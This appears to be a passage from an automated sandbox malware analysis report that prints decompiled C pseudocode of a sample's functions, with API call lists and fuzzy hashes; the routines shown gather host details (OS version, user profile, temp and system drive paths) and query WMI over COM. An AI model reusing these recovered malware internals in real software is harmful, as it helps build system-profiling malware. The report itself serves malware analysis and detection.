    				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
    				_t2 = _t5 + 1; // 0x1
    				asm("sbb ecx, ecx");
    				return _t5 &  ~_t2;
    			}





    APIs
    • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00E5A6AF,00000000,00000400,00000000,00E5F8C0,00E5F8C0,?,00E5FA61,00000000), ref: 00E5A635
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: CreateFile
    • String ID:
    • API String ID: 823142352-0
    • Opcode ID: 68b7296f98f69d61857187e5a33669125f306d200527f49d5835f2d987f61981
    • Instruction ID: d703f9bc8f045d70614984d2ddfee225b71dadde9829021f3dda74ee639cdae6
    • Opcode Fuzzy Hash: 68b7296f98f69d61857187e5a33669125f306d200527f49d5835f2d987f61981
    • Instruction Fuzzy Hash: 13D012B13A0100BEFB2C8B34DD5AF76329CD710701F22025CBA06EA0E1CAA9E9088720
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00E585EA(long _a4) {
    				void* _t2;
    
    				_t2 = RtlAllocateHeap( *0xe6e768, 8, _a4); // executed
    				return _t2;
    			}





    APIs
    • RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: bca370513adb158315529eb587ffc5de4aaee7b3e98e8124989489a55927ae80
    • Instruction ID: 8954eefe638546fe86c778dd9485430f9ff989b1d201896b3e411855aa161aeb
    • Opcode Fuzzy Hash: bca370513adb158315529eb587ffc5de4aaee7b3e98e8124989489a55927ae80
    • Instruction Fuzzy Hash: 75B09235080208FFEE411B92FD05A867F69E705695F009011F60C241B18AB26468DB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00E585D5() {
    				void* _t1;
    
    				_t1 = HeapCreate(0, 0x80000, 0); // executed
    				 *0xe6e768 = _t1;
    				return _t1;
    			}





    APIs
    • HeapCreate.KERNELBASE(00000000,00080000,00000000,00E55F84), ref: 00E585DE
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: CreateHeap
    • String ID:
    • API String ID: 10892065-0
    • Opcode ID: d69da316d96e4d2d230f76001205048bb8c116cbff4062a3245378a55ab3bc5f
    • Instruction ID: 48c64ad4ac5c7ff70acc5eb128d9d18a193bd779d0b2256e070ecfbfac85f702
    • Opcode Fuzzy Hash: d69da316d96e4d2d230f76001205048bb8c116cbff4062a3245378a55ab3bc5f
    • Instruction Fuzzy Hash: 7CB012742807006EF6E01B217E06B013690A300B46F301001F304782D0CAE0200CCA04
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E00E5F9CA(void* __edx) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				intOrPtr _t26;
    				char _t27;
    				intOrPtr _t29;
    				void* _t31;
    				void* _t36;
    				char _t38;
    				intOrPtr _t39;
    				char _t42;
    				intOrPtr _t51;
    				intOrPtr _t52;
    				intOrPtr* _t63;
    				intOrPtr _t66;
    				char* _t67;
    				intOrPtr _t69;
    				char _t78;
    				void* _t81;
    				void* _t82;
    
    				_t26 =  *0xe6e654; // 0x510fb08
    				_t27 = E00E585EA( *((intOrPtr*)(_t26 + 4))); // executed
    				_v12 = _t27;
    				if(_t27 != 0) {
    					_t63 =  *0xe6e654; // 0x510fb08
    					if( *((intOrPtr*)(_t63 + 4)) > 0x400) {
    						E00E586C7(_t27,  *_t63, 0x400);
    						_v8 = 0;
    						_t36 = E00E5109A(_t63, 0x34a);
    						_t66 =  *0xe6e688; // 0xe80000
    						_t72 =  !=  ? 0x67d : 0x615;
    						_t38 = E00E595C7(_t66,  !=  ? 0x67d : 0x615);
    						_push(0);
    						_push(_t36);
    						_t67 = "\\";
    						_v24 = _t38;
    						_push(_t67);
    						_push(_t38);
    						_t39 =  *0xe6e688; // 0xe80000
    						_push(_t67);
    						_v20 = E00E592CB(_t39 + 0x1020);
    						_t42 = E00E5A68F( &_v8, _t41,  &_v8); // executed
    						_v16 = _t42;
    						E00E585BB( &_v24);
    						E00E585BB( &_v20);
    						_t73 = _v16;
    						_t82 = _t81 + 0x3c;
    						_t69 = _v8;
    						if(_v16 != 0 && _t69 > 0x400) {
    							_t51 =  *0xe6e654; // 0x510fb08
    							_t52 =  *((intOrPtr*)(_t51 + 4));
    							_t53 =  <  ? _t69 : _t52;
    							_t54 = ( <  ? _t69 : _t52) + 0xfffffc00;
    							E00E586C7(_v12 + 0x400, _t73 + 0x400, ( <  ? _t69 : _t52) + 0xfffffc00);
    							_t69 = _v8;
    							_t82 = _t82 + 0xc;
    						}
    						E00E58600( &_v16, _t69); // executed
    						E00E58600( &_v20, 0xfffffffe);
    						_t27 = _v12;
    						_t81 = _t82 + 0x10;
    						_t63 =  *0xe6e654; // 0x510fb08
    					}
    					_t78 = 0;
    					while(1) {
    						_t29 =  *0xe6e688; // 0xe80000
    						_t31 = E00E5A763(_t29 + 0x228, _t27,  *((intOrPtr*)(_t63 + 4))); // executed
    						_t81 = _t81 + 0xc;
    						if(_t31 >= 0) {
    							break;
    						}
    						Sleep(1);
    						_t78 = _t78 + 1;
    						if(_t78 < 0x2710) {
    							_t27 = _v12;
    							_t63 =  *0xe6e654; // 0x510fb08
    							continue;
    						}
    						break;
    					}
    					E00E58600( &_v12, 0);
    				}
    				return 0;
    			}


























    APIs
      • Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8
    • Sleep.KERNELBASE(00000001,00000000,00000000,00000000,?,?,?,?,00E5F8C0,?,?,?,00E5FCC4,00000000), ref: 00E5FAF7
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: AllocateHeapSleep
    • String ID:
    • API String ID: 4201116106-0
    • Opcode ID: 8c2feb3e026506c1f83094ff0dcfe0a0e4a20e2ba99f2ae2cd976773403c81f4
    • Instruction ID: 7e25b387e221f6aafa15a527cbe70730ab7d938025545d5e03189906c7db345c
    • Opcode Fuzzy Hash: 8c2feb3e026506c1f83094ff0dcfe0a0e4a20e2ba99f2ae2cd976773403c81f4
    • Instruction Fuzzy Hash: BE41CE71A00104EFDB00EBA4DD85EAF73FCEB44345F044979F905F7292EA749A098BA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E00E55D65(void* __eflags) {
    				char _v44;
    				intOrPtr _t7;
    				intOrPtr _t10;
    				void* _t11;
    				WCHAR* _t12;
    				WCHAR* _t13;
    				WCHAR* _t14;
    				intOrPtr _t15;
    				intOrPtr _t19;
    				intOrPtr _t22;
    				void* _t27;
    				WCHAR* _t28;
    
    				_t7 =  *0xe6e688; // 0xe80000
    				E00E5A853( &_v44,  *((intOrPtr*)(_t7 + 0xac)) + 4, __eflags);
    				_t10 =  *0xe6e684; // 0x510f6c8
    				_t28 = 2;
    				_t11 =  *((intOrPtr*)(_t10 + 0xbc))(_t28, 0,  &_v44, _t27);
    				if(_t11 == 0) {
    					_t22 =  *0xe6e688; // 0xe80000
    					_t12 = E00E5595C( *((intOrPtr*)(_t22 + 0xac)), 0, __eflags); // executed
    					 *0xe6e6ac = _t12;
    					__eflags = _t12;
    					if(_t12 != 0) {
    						_t14 = E00E59EA1();
    						__eflags = _t14;
    						if(_t14 == 0) {
    							_t28 = 0;
    							__eflags = 0;
    						} else {
    							_t15 =  *0xe6e688; // 0xe80000
    							lstrcmpiW(_t15 + 0x228, _t14);
    							asm("sbb esi, esi");
    							_t28 = _t28 + 1;
    						}
    					}
    					_t13 = _t28;
    				} else {
    					_t19 =  *0xe6e684; // 0x510f6c8
    					 *((intOrPtr*)(_t19 + 0x30))(_t11);
    					_t13 = 3;
    				}
    				return _t13;
    			}

    APIs
    • lstrcmpiW.KERNEL32(00E7FDD8,00000000), ref: 00E55DDA
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: lstrcmpi
    • String ID:
    • API String ID: 1586166983-0
    • Opcode ID: b2a37081bbf9b2ef8868bd08c88deb456c49740fa75e29b9dd6121f86b7d7b90
    • Instruction ID: 4920f6a753d47951a12a36a061ffbdc8ea52b04c26b57c438786c52648555f86
    • Opcode Fuzzy Hash: b2a37081bbf9b2ef8868bd08c88deb456c49740fa75e29b9dd6121f86b7d7b90
    • Instruction Fuzzy Hash: 9901B1372011119FE740E76AEC69F9B33E89B08356F155424F902FB2A1DAA0D8098BB1
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 86%
    			E00E5D02A(void* __fp0) {
    				char _v8;
    				char _v12;
    				char _v16;
    				struct _SYSTEM_INFO _v52;
    				char _v180;
    				char _v692;
    				char _v704;
    				char _v2680;
    				void* __esi;
    				struct _OSVERSIONINFOA* _t81;
    				intOrPtr _t83;
    				void* _t84;
    				long _t86;
    				intOrPtr* _t88;
    				intOrPtr _t90;
    				intOrPtr _t95;
    				intOrPtr _t97;
    				void* _t98;
    				intOrPtr _t103;
    				char* _t105;
    				void* _t108;
    				char _t115;
    				signed int _t117;
    				char _t119;
    				intOrPtr _t124;
    				intOrPtr _t127;
    				intOrPtr _t130;
    				intOrPtr _t134;
    				intOrPtr _t147;
    				intOrPtr _t149;
    				intOrPtr _t152;
    				intOrPtr _t154;
    				signed int _t159;
    				struct HINSTANCE__* _t162;
    				short* _t164;
    				intOrPtr _t167;
    				WCHAR* _t168;
    				char* _t169;
    				intOrPtr _t181;
    				intOrPtr _t200;
    				void* _t215;
    				char _t218;
    				void* _t219;
    				char* _t220;
    				struct _OSVERSIONINFOA* _t222;
    				void* _t223;
    				int* _t224;
    				void* _t241;
    
    				_t241 = __fp0;
    				_t162 =  *0xe6e69c; // 0x10000000
    				_t81 = E00E585EA(0x1ac4);
    				_t222 = _t81;
    				if(_t222 == 0) {
    					return _t81;
    				}
    				 *((intOrPtr*)(_t222 + 0x1640)) = GetCurrentProcessId();
    				_t83 =  *0xe6e684; // 0x510f6c8
    				_t84 =  *((intOrPtr*)(_t83 + 0xa0))(_t215);
    				_t3 = _t222 + 0x648; // 0x648
    				E00E6230C( *((intOrPtr*)(_t222 + 0x1640)) + _t84, _t3);
    				_t5 = _t222 + 0x1644; // 0x1644
    				_t216 = _t5;
    				_t86 = GetModuleFileNameW(0, _t5, 0x105);
    				_t227 = _t86;
    				if(_t86 != 0) {
    					 *((intOrPtr*)(_t222 + 0x1854)) = E00E58FA4(_t216, _t227);
    				}
    				GetCurrentProcess();
    				_t88 = E00E5B9EB();
    				 *((intOrPtr*)(_t222 + 0x110)) = _t88;
    				_t178 =  *_t88;
    				if(E00E5BB73( *_t88) == 0) {
    					_t90 = E00E5BA48(_t178, _t222);
    					__eflags = _t90;
    					_t181 = (0 | _t90 > 0x00000000) + 1;
    					__eflags = _t181;
    					 *((intOrPtr*)(_t222 + 0x214)) = _t181;
    				} else {
    					 *((intOrPtr*)(_t222 + 0x214)) = 3;
    				}
    				_t12 = _t222 + 0x220; // 0x220
    				 *((intOrPtr*)(_t222 + 0x218)) = E00E5E3FC(_t12);
    				 *((intOrPtr*)(_t222 + 0x21c)) = E00E5E3C1(_t12);
    				_push( &_v16);
    				 *(_t222 + 0x224) = _t162;
    				_push( &_v8);
    				_v12 = 0x80;
    				_push( &_v692);
    				_v8 = 0x100;
    				_push( &_v12);
    				_t22 = _t222 + 0x114; // 0x114
    				_push( *((intOrPtr*)( *((intOrPtr*)(_t222 + 0x110)))));
    				_t95 =  *0xe6e68c; // 0x510f890
    				_push(0);
    				if( *((intOrPtr*)(_t95 + 0x6c))() == 0) {
    					GetLastError();
    				}
    				_t97 =  *0xe6e694; // 0x510f820
    				_t98 =  *((intOrPtr*)(_t97 + 0x3c))(0x1000);
    				_t26 = _t222 + 0x228; // 0x228
    				 *(_t222 + 0x1850) = 0 | _t98 > 0x00000000;
    				GetModuleFileNameW( *(_t222 + 0x224), _t26, 0x105);
    				GetLastError();
    				_t31 = _t222 + 0x228; // 0x228
    				 *((intOrPtr*)(_t222 + 0x434)) = E00E58FA4(_t31, _t98);
    				_t34 = _t222 + 0x114; // 0x114
    				_t103 = E00E5B78E(_t34,  &_v692);
    				_t35 = _t222 + 0xb0; // 0xb0
    				 *((intOrPtr*)(_t222 + 0xac)) = _t103;
    				_push(_t35);
    				E00E5B663(_t103, _t35, _t98, _t241);
    				_t37 = _t222 + 0xb0; // 0xb0
    				_t105 = _t37;
    				_t38 = _t222 + 0xd0; // 0xd0
    				_t164 = _t38;
    				if(_t105 != 0) {
    					_t159 = MultiByteToWideChar(0, 0, _t105, 0xffffffff, _t164, 0x20);
    					if(_t159 > 0) {
    						_t164[_t159] = 0;
    					}
    				}
    				_t41 = _t222 + 0x438; // 0x438
    				_t42 = _t222 + 0x228; // 0x228
    				E00E58FBE(_t42, _t41);
    				_t43 = _t222 + 0xb0; // 0xb0
    				_t108 = E00E5D40B(_t43, E00E5C384(_t43), 0);
    				_t44 = _t222 + 0x100c; // 0x100c
    				E00E5B870(_t108, _t44, _t241);
    				_t199 = GetCurrentProcess();
    				 *((intOrPtr*)(_t222 + 0x101c)) = E00E5BBC5(_t110);
    				memset(_t222, 0, 0x9c);
    				_t224 = _t223 + 0xc;
    				_t222->dwOSVersionInfoSize = 0x9c;
    				GetVersionExA(_t222);
    				_t167 =  *0xe6e684; // 0x510f6c8
    				_t115 = 0;
    				_v8 = 0;
    				if( *((intOrPtr*)(_t167 + 0x6c)) != 0) {
    					 *((intOrPtr*)(_t167 + 0x6c))(GetCurrentProcess(),  &_v8);
    					_t115 = _v8;
    				}
    				 *((intOrPtr*)(_t222 + 0xa8)) = _t115;
    				if(_t115 == 0) {
    					GetSystemInfo( &_v52);
    					_t117 = _v52.dwOemId & 0x0000ffff;
    				} else {
    					_t117 = 9;
    				}
    				_t54 = _t222 + 0x1020; // 0x1020
    				_t168 = _t54;
    				 *(_t222 + 0x9c) = _t117;
    				GetWindowsDirectoryW(_t168, 0x104);
    				_t119 = E00E595C7(_t199, 0x10c);
    				_t200 =  *0xe6e684; // 0x510f6c8
    				_t218 = _t119;
    				 *_t224 = 0x104;
    				_push( &_v704);
    				_push(_t218);
    				_v8 = _t218;
    				if( *((intOrPtr*)(_t200 + 0xe0))() == 0) {
    					_t154 =  *0xe6e684; // 0x510f6c8
    					 *((intOrPtr*)(_t154 + 0xfc))(_t218, _t168);
    				}
    				E00E585BB( &_v8);
    				_t124 =  *0xe6e684; // 0x510f6c8
    				_t61 = _t222 + 0x1434; // 0x1434
    				_t219 = _t61;
    				 *_t224 = 0x209;
    				_push(_t219);
    				_push(L"USERPROFILE");
    				if( *((intOrPtr*)(_t124 + 0xe0))() == 0) {
    					E00E59626(_t219, 0x105, L"%s\\%s", _t168);
    					_t152 =  *0xe6e684; // 0x510f6c8
    					_t224 =  &(_t224[5]);
    					 *((intOrPtr*)(_t152 + 0xfc))(L"USERPROFILE", _t219, "TEMP");
    				}
    				_push(0x20a);
    				_t64 = _t222 + 0x122a; // 0x122a
    				_t169 = L"TEMP";
    				_t127 =  *0xe6e684; // 0x510f6c8
    				_push(_t169);
    				if( *((intOrPtr*)(_t127 + 0xe0))() == 0) {
    					_t149 =  *0xe6e684; // 0x510f6c8
    					 *((intOrPtr*)(_t149 + 0xfc))(_t169, _t219);
    				}
    				_push(0x40);
    				_t220 = L"SystemDrive";
    				_push( &_v180);
    				_t130 =  *0xe6e684; // 0x510f6c8
    				_push(_t220);
    				if( *((intOrPtr*)(_t130 + 0xe0))() == 0) {
    					_t147 =  *0xe6e684; // 0x510f6c8
    					 *((intOrPtr*)(_t147 + 0xfc))(_t220, L"C:");
    				}
    				_v8 = 0x7f;
    				_t72 = _t222 + 0x199c; // 0x199c
    				_t134 =  *0xe6e684; // 0x510f6c8
    				 *((intOrPtr*)(_t134 + 0xb0))(_t72,  &_v8);
    				_t75 = _t222 + 0x100c; // 0x100c
    				E00E6230C(E00E5D40B(_t75, E00E5C384(_t75), 0),  &_v2680);
    				_t76 = _t222 + 0x1858; // 0x1858
    				E00E622DE( &_v2680, _t76, 0x20);
    				_t79 = _t222 + 0x1878; // 0x1878
    				E00E59013(1, _t79, 0x14, 0x1e,  &_v2680);
    				 *((intOrPtr*)(_t222 + 0x1898)) = E00E5CD3E(_t79);
    				return _t222;
    			}

    APIs
      • Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8
    • GetCurrentProcessId.KERNEL32 ref: 00E5D051
    • GetModuleFileNameW.KERNEL32(00000000,00001644,00000105), ref: 00E5D08D
    • GetCurrentProcess.KERNEL32 ref: 00E5D0AA
    • GetLastError.KERNEL32 ref: 00E5D149
    • GetModuleFileNameW.KERNEL32(?,00000228,00000105), ref: 00E5D177
    • GetLastError.KERNEL32 ref: 00E5D17D
    • MultiByteToWideChar.KERNEL32(00000000,00000000,000000B0,000000FF,000000D0,00000020), ref: 00E5D1D2
    • GetCurrentProcess.KERNEL32 ref: 00E5D219
    • memset.MSVCRT ref: 00E5D234
    • GetVersionExA.KERNEL32(00000000), ref: 00E5D23F
    • GetCurrentProcess.KERNEL32(00000100), ref: 00E5D259
    • GetSystemInfo.KERNEL32(?), ref: 00E5D275
    • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 00E5D292
    Strings
    Memory Dump Source
    • Source File: 00000005.00000002.702624880.0000000000E50000.00000040.00020000.sdmp, Offset: 00E50000, based on PE: true
    Similarity
    • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
    • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
    • API String ID: 3876402152-2706916422
    • Opcode ID: d21baa9acfda2a8528282d96f861aafe3d70469a57535dffee81d238b2f31155
    • Instruction ID: abd0f47ef3dddf781f63f2c49a8a9e125234a200678ff0521bccd0bb566f51a8
    • Opcode Fuzzy Hash: d21baa9acfda2a8528282d96f861aafe3d70469a57535dffee81d238b2f31155
    • Instruction Fuzzy Hash: 47B19271600704AFD720EB71DD85FEB77E8EF18341F005829F95AE7291EBB0A9498B61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E00E5DB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
    				signed int _v12;
    				signed int _v16;
    				signed int _v20;
    				char _v24;
    				void* _v28;
    				signed int _v32;
    				char _v36;
    				intOrPtr _v40;
    				signed int _v44;
    				char _v48;
    				char _v52;
    				intOrPtr _v56;
    				signed int _v60;
    				char* _v72;
    				signed short _v80;
    				signed int _v84;
    				char _v88;
    				char _v92;
    				char _v96;
    				intOrPtr _v100;
    				char _v104;
    				char _v616;
    				intOrPtr* _t159;
    				char _t165;
    				signed int _t166;
    				signed int _t173;
    				signed int _t178;
    				signed int _t186;
    				intOrPtr* _t187;
    				signed int _t188;
    				signed int _t192;
    				intOrPtr* _t193;
    				intOrPtr _t200;
    				intOrPtr* _t205;
    				signed int _t207;
    				signed int _t209;
    				intOrPtr* _t210;
    				intOrPtr _t212;
    				intOrPtr* _t213;
    				signed int _t214;
    				char _t217;
    				signed int _t218;
    				signed int _t219;
    				signed int _t230;
    				signed int _t235;
    				signed int _t242;
    				signed int _t243;
    				signed int _t244;
    				signed int _t245;
    				intOrPtr* _t247;
    				intOrPtr* _t251;
    				signed int _t252;
    				intOrPtr* _t253;
    				void* _t255;
    				intOrPtr* _t261;
    				signed int _t262;
    				signed int _t283;
    				signed int _t289;
    				char* _t298;
    				void* _t320;
    				signed int _t322;
    				intOrPtr* _t323;
    				intOrPtr _t324;
    				signed int _t327;
    				intOrPtr* _t328;
    				intOrPtr* _t329;
    
    				_v32 = _v32 & 0x00000000;
    				_v60 = _v60 & 0x00000000;
    				_v56 = __edx;
    				_v100 = __ecx;
    				_t159 = E00E5D52E(__ecx);
    				_t251 = _t159;
    				_v104 = _t251;
    				if(_t251 == 0) {
    					return _t159;
    				}
    				_t320 = E00E585EA(0x10);
    				_v36 = _t320;
    				_pop(_t255);
    				if(_t320 == 0) {
    					L53:
    					E00E58600( &_v60, 0xfffffffe);
    					E00E5D5E2( &_v104);
    					return _t320;
    				}
    				_t165 = E00E595C7(_t255, 0x536);
    				 *_t328 = 0x609;
    				_v52 = _t165;
    				_t166 = E00E595C7(_t255);
    				_push(0);
    				_push(_v56);
    				_v20 = _t166;
    				_push(_t166);
    				_push(_a4);
    				_t322 = E00E592CB(_t165);
    				_v60 = _t322;
    				E00E585BB( &_v52);
    				E00E585BB( &_v20);
    				_t329 = _t328 + 0x20;
    				if(_t322 != 0) {
    					_t323 = __imp__#2;
    					_v40 =  *_t323(_t322);
    					_t173 = E00E595C7(_t255, 0x9e4);
    					_v20 = _t173;
    					_v52 =  *_t323(_t173);
    					E00E585BB( &_v20);
    					_t324 = _v40;
    					_t261 =  *_t251;
    					_t252 = 0;
    					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
    					__eflags = _t178;
    					if(_t178 != 0) {
    						L52:
    						__imp__#6(_t324);
    						__imp__#6(_v52);
    						goto L53;
    					}
    					_t262 = _v32;
    					_v28 = 0;
    					_v20 = 0;
    					__eflags = _t262;
    					if(_t262 == 0) {
    						L49:
    						 *((intOrPtr*)( *_t262 + 8))(_t262);
    						__eflags = _t252;
    						if(_t252 == 0) {
    							E00E58600( &_v36, 0);
    							_t320 = _v36;
    						} else {
    							 *(_t320 + 8) = _t252;
    							 *_t320 = E00E591C9(_v100);
    							 *((intOrPtr*)(_t320 + 4)) = E00E591C9(_v56);
    						}
    						goto L52;
    					} else {
    						goto L6;
    					}
    					while(1) {
    						L6:
    						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
    						__eflags = _t186;
    						if(_t186 != 0) {
    							break;
    						}
    						_v16 = 0;
    						_v48 = 0;
    						_v12 = 0;
    						_v24 = 0;
    						__eflags = _v84;
    						if(_v84 == 0) {
    							break;
    						}
    						_t187 = _v28;
    						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
    						__eflags = _t188;
    						if(_t188 >= 0) {
    							__imp__#20(_v24, 1,  &_v16);
    							__imp__#19(_v24, 1,  &_v48);
    							_t46 = _t320 + 0xc; // 0xc
    							_t253 = _t46;
    							_t327 = _t252 << 3;
    							_t47 = _t327 + 8; // 0x8
    							_t192 = E00E5867E(_t327, _t47);
    							__eflags = _t192;
    							if(_t192 == 0) {
    								__imp__#16(_v24);
    								_t193 = _v28;
    								 *((intOrPtr*)( *_t193 + 8))(_t193);
    								L46:
    								_t252 = _v20;
    								break;
    							}
    							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
    							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00E585EA( *(_t327 +  *_t253) << 3);
    							_t200 =  *_t253;
    							__eflags =  *(_t327 + _t200 + 4);
    							if( *(_t327 + _t200 + 4) == 0) {
    								_t136 = _t320 + 0xc; // 0xc
    								E00E58600(_t136, 0);
    								E00E58600( &_v36, 0);
    								__imp__#16(_v24);
    								_t205 = _v28;
    								 *((intOrPtr*)( *_t205 + 8))(_t205);
    								_t320 = _v36;
    								goto L46;
    							}
    							_t207 = _v16;
    							while(1) {
    								_v12 = _t207;
    								__eflags = _t207 - _v48;
    								if(_t207 > _v48) {
    									break;
    								}
    								_v44 = _v44 & 0x00000000;
    								_t209 =  &_v12;
    								__imp__#25(_v24, _t209,  &_v44);
    								__eflags = _t209;
    								if(_t209 < 0) {
    									break;
    								}
    								_t212 = E00E591C9(_v44);
    								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
    								_t213 = _v28;
    								_t281 =  *_t213;
    								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
    								__eflags = _t214;
    								if(_t214 < 0) {
    									L39:
    									__imp__#6(_v44);
    									_t207 = _v12 + 1;
    									__eflags = _t207;
    									continue;
    								}
    								_v92 = E00E595C7(_t281, 0x250);
    								 *_t329 = 0x4cc;
    								_t217 = E00E595C7(_t281);
    								_t283 = _v80;
    								_v96 = _t217;
    								_t218 = _t283 & 0x0000ffff;
    								__eflags = _t218 - 0xb;
    								if(__eflags > 0) {
    									_t219 = _t218 - 0x10;
    									__eflags = _t219;
    									if(_t219 == 0) {
    										L35:
    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00E585EA(0x18);
    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
    										__eflags = _t289;
    										if(_t289 == 0) {
    											L38:
    											E00E585BB( &_v92);
    											E00E585BB( &_v96);
    											__imp__#9( &_v80);
    											goto L39;
    										}
    										_push(_v72);
    										_push(L"%d");
    										L37:
    										_push(0xc);
    										_push(_t289);
    										E00E59626();
    										_t329 = _t329 + 0x10;
    										goto L38;
    									}
    									_t230 = _t219 - 1;
    									__eflags = _t230;
    									if(_t230 == 0) {
    										L33:
    										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00E585EA(0x18);
    										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
    										__eflags = _t289;
    										if(_t289 == 0) {
    											goto L38;
    										}
    										_push(_v72);
    										_push(L"%u");
    										goto L37;
    									}
    									_t235 = _t230 - 1;
    									__eflags = _t235;
    									if(_t235 == 0) {
    										goto L33;
    									}
    									__eflags = _t235 == 1;
    									if(_t235 == 1) {
    										goto L33;
    									}
    									L28:
    									__eflags = _t283 & 0x00002000;
    									if((_t283 & 0x00002000) == 0) {
    										_v88 = E00E595C7(_t283, 0x219);
    										E00E59626( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
    										E00E585BB( &_v88);
    										_t329 = _t329 + 0x18;
    										_t298 =  &_v616;
    										L31:
    										_t242 = E00E591C9(_t298);
    										L32:
    										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
    										goto L38;
    									}
    									_t242 = E00E5DA2B( &_v80);
    									goto L32;
    								}
    								if(__eflags == 0) {
    									__eflags = _v72 - 0xffff;
    									_t298 = L"TRUE";
    									if(_v72 != 0xffff) {
    										_t298 = L"FALSE";
    									}
    									goto L31;
    								}
    								_t243 = _t218 - 1;
    								__eflags = _t243;
    								if(_t243 == 0) {
    									goto L38;
    								}
    								_t244 = _t243 - 1;
    								__eflags = _t244;
    								if(_t244 == 0) {
    									goto L35;
    								}
    								_t245 = _t244 - 1;
    								__eflags = _t245;
    								if(_t245 == 0) {
    									goto L35;
    								}
    								__eflags = _t245 != 5;
    								if(_t245 != 5) {
    									goto L28;
    								}
    								_t298 = _v72;
    								goto L31;
    							}
    							__imp__#16(_v24);
    							_t210 = _v28;
    							 *((intOrPtr*)( *_t210 + 8))(_t210);
    							_t252 = _v20;
    							L42:
    							_t262 = _v32;
    							_t252 = _t252 + 1;
    							_v20 = _t252;
    							__eflags = _t262;
    							if(_t262 != 0) {
    								continue;
    							}
    							L48:
    							_t324 = _v40;
    							goto L49;
    						}
    						_t247 = _v28;
    						 *((intOrPtr*)( *_t247 + 8))(_t247);
    						goto L42;
    					}
    					_t262 = _v32;
    					goto L48;
    				} else {
    					E00E58600( &_v36, _t322);
    					_t320 = _v36;
    					goto L53;
    				}
    			}

    APIs
      • Part of subcall function 00E5D52E: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D541
      • Part of subcall function 00E5D52E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D552
      • Part of subcall function 00E5D52E: CoCreateInstance.OLE32(00E6B840,00000000,00000001,00E6B850,?,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D569
      • Part of subcall function 00E5D52E: SysAllocString.OLEAUT32(00000000), ref: 00E5D574
      • Part of subcall function 00E5D52E: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00E5D82E,00000C5B,00000000,?,00000000), ref: 00E5D59F
      • Part of subcall function 00E585EA: RtlAllocateHeap.NTDLL(00000008,?,?,00E58F6A,00000100,?,00E55FA8), ref: 00E585F8
    • SysAllocString.OLEAUT32(00000000), ref: 00E5DBF0
    • SysAllocString.OLEAUT32(00000000), ref: 00E5DC04
    • SysFreeString.OLEAUT32(?), ref: 00E5DF8D
    • SysFreeString.OLEAUT32(?), ref: 00E5DF96
      • Part of subcall function 00E58600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00E56020), ref: 00E58646
    Strings
    Memory Dump Source
